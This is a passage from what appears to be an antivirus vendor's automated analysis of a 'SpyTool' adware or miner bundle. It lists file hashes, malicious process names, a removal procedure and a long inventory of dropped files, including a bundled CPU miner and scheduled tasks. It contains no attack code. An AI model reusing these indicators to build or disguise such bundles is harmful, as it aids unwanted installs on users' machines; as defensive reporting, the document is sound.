| 72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
| c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
| 634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
| 6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
| 17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
| 2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
| a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
| 302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
| 814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
| 90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
| 4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
| 690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
| e895efdd3b44b10da50e57bafc95b78c | c:\Program Files\gmsd_re_005010095\gamesdesktop_widget.exe |
| de8fc173a33b5a5fbaf29438e3f2558c | c:\Program Files\gmsd_re_005010095\gmsd_re_005010095.exe |
| 2d677763c2675030c73647c5d1f6940d | c:\Program Files\gmsd_re_005010095\predm.exe |
| 6ab1fdcb00d1df4a9359d012eaec579a | c:\Program Files\gmsd_re_005010095\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:1824
taskkill.exe:844
taskkill.exe:2040
6895.exe:928
nsjA.tmp:1028
nsj20.tmp:1672
amisid.exe:1116
nsr4.tmp:1452
upgmsd_re_005010095.exe:436
nsr14.tmp:1568
wmic.exe:1276
nsc18.tmp:1336
encrypt.exe:1052
encrypt.exe:1484
encrypt.exe:1972
encrypt.exe:1512
tasklist.exe:1256
tasklist.exe:1536
setup.exe:2036
%original file name%.exe:396
gmsd_re_005010095.exe:1336
nst1D.tmp:1520
nss2D.tmp:1436
nss2D.tmp:372 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2A.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\B82B3152-E8DD-4672-BD9-1E9973F4C5A3\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\chrome.packed.7z (1308045 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yelp.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ted.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\gmail.ico (1601 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_translate.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\wikipedia.ico (1913 bytes)
%WinDir%\Tasks\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.job (1656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuF.tmp (11240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj20.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm34.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\56xtF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2D.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm8.tmp (15 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.cyl (428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (5152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi39.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd38.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup[1].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1B.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.exe (92316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.exe (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.exe (31990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.exe (24211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
